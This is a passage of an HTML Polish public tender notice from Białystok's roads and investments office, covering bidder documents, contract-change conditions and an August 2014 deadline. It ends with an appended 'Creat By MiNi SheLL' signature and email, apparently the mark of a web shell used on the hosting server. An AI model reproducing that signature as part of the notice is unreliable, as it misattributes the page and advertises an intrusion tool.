<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  W przypadku  wykonawców  wspólnie ubiegających  się o udzielenie zamówienia:
a)  każdy  wykonawca  zobowiązany jest złożyć  oddzielnie  dokument określony w sekcji III.4.2) tiret 2 oraz  III.4.4) tiret 1, 
b)  warunki dotyczące posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym, osobami zdolnymi do wykonania zamówienia oraz sytuacji ekonomicznej i finansowej badane będą łącznie - dokumenty określone w sekcji III.4.1) tiret 1-4 - winien złożyć co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie  zamówienia;
c)  oświadczenie  o spełnieniu warunków udziału w postępowaniu określone w sekcji III.4.1) oraz oświadczenie o nie podleganiu wykluczeniu z postępowania określone w sekcji III.4.2) tiret 1 - składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
2. Zgodnie z art. 26 ust. 2b) ustawy Pzp, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów (przedstawione w formie oryginału lub notarialnie poświadczonej kopii) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (na lub wg. zał. Nr 5 do SIWZ).
Zobowiązanie do udostępnienia zasobów w trybie art. 26 ust. 2b ustawy winno być sporządzone zgodnie z zasadami reprezentacji podmiotu, który takie zobowiązanie podejmuje.   W przypadku innych podmiotów, na zasobach których  Wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów stanowiące dowody, muszą być poświadczane za zgodność z oryginałem przez te podmioty.
 
3.Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 pkt 2-3 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w stopniu niezbędnym dla należytego wykonania zamówienia oraz, że stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, przedkładając w tym celu dokumenty dotyczące w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu;
b)	sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c)	charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

Udostępnienie wykonawcy potencjału wiedzy i doświadczenia przez podmiot trzeci wiąże się z   udziałem podmiotu trzeciego przy realizacji zamówienia  

4.  Dowodami,  o których mowa w  sekcji III.4.1) są: 
        1) poświadczenie,
  2) i inne dokumenty, jeżeli z uzasadnionych przyczyn, o obiektywnym charakterze wykonawca nie jest  w stanie uzyskać poświadczenia, o którym mowa wyżej.

W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie zostały wcześniej wykonane,  wykonawca nie ma obowiązku przedkładania dowodów.

4. 	Dokumenty podmiotów zagranicznych:
1)	jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w sekcji III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy,  złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem,
2)	dokument, o którym mowa w sekcji III.4.3.1)  lub zastępujący go dokument, o którym mowa w pkt 1, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)  w przypadku wątpliwości, co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p><p><b>III.7)</b><p>
<p><b>ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne</b> - należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach </p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych.
2.	Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku do treści oferty Wykonawcy, w następującym zakresie i okolicznościach:
1)	zmiany terminu zakończenia wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w następujących przypadkach:
a)	wystąpienie konieczności wykonania dodatkowych i niemożliwych do przewidzenia robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania,
b)	wstrzymanie realizacji robót przez Zamawiającego, z przyczyn niezależnych od Zamawiającego,
c)	wstrzymanie realizacji robót przez właściwe organy administracji publicznej bądź orzeczeniem sądu,
d)	przekroczenie zakreślonych przez prawo terminów wydawania przez organ administracji decyzji, zezwoleń, itp. oraz uzgodnień warunków technicznych,
e)	odmowa wydania przez organ administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,
f)	konieczności usunięcia błędów w dokumentacji projektowej oraz konieczności przeprojektowania określonych zakresów obiektu w trakcie realizacji inwestycji, niezbędnych do prawidłowego wykonania przedmiotu umowy,
g)	konieczności wykonania robót wykopaliskowych uniemożliwiających wykonanie przedmiotu umowy,
h)	wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny,
i)	wystąpienie szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczną,
j)	siły wyższej, tj. zdarzenia nagłego, nieprzewidywalnego i niezależnego od woli stron, uniemożliwiającego wykonanie umowy w całości lub części (np. pożar, trzęsienie ziemi, tornado, powódź);
k)	zmiany obowiązujących przepisów prawa;
2)	zmiany materiałów koniecznych do wykonywania robót pod warunkiem, że zmiana ta będzie wynikać z niedostępności na rynku tych materiałów spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku;
3)	zmiany jakości materiałów i innych cech charakterystycznych któregokolwiek elementu robót pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego;
4)	wystąpienia warunków geologicznych, archeologicznymi lub terenowych odmiennych od przyjętych w dokumentacji projektowej, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych;
5)	wprowadzenia zmian w stosunku do dokumentacji projektowej na wykonanie robót zamiennych nie wykraczających poza zakres przedmiotu zamówienia w sytuacji konieczności zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy lub usunięcia wad ukrytych dokumentacji projektowej lub uzyskania założonego efektu użytkowego lub zmiany obowiązujących przepisów prawa;
6)	zmniejszenia zakresu rzeczowego w obiektywnie uzasadnionych przypadkach;
7)	zmiana stawki podatku VAT wynikająca z obowiązującego prawa;
8)	zmiany Podwykonawcy robót, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę oraz spełnieniem przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
3.	W przypadku okoliczności, o których mowa w ust. 2 pkt 2 - 6 dopuszcza się zmianę wynagrodzenia, o którym mowa w § 4 ust. 1. W takim przypadku Wykonawca powinien przedłożyć do akceptacji Zamawiającego kalkulację ceny jednostkowej robót zgodnie ze stawkami określonymi w kosztorysie ofertowym, a przypadku wystąpienia robót innych niż przewidziano w kosztorysie ofertowym - z uwzględnieniem cen nie wyższych od średnich cen publikowanych w wydawnictwie Sekocenbud w miesiącu, w którym kalkulacja jest sporządzana oraz nakładów rzeczowych określonych w Katalogach Nakładów Rzeczowych (KNR), w przypadku robót, dla których nie określono nakładów rzeczowych w KNR, wg innych ogólnie stosowanych katalogów lub nakładów własnych zaakceptowanych przez Zamawiającego.
4.	Warunkiem dokonania zmiany, o której mowa w ust. 2 i 3, jest złożenie uzasadnionego wniosku przez Stronę inicjującą zmianę lub sporządzenie przez Strony stosownego protokołu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Białymstoku ul.Składowa 11   Zarząd Dróg i Inwestycji Miejskich p. 222.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2014 godzina 08:45, miejsce: Urząd Miejski w Białymstoku,  Zarząd Dróg i Inwestycji Miejskich ul. Składowa 11, (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com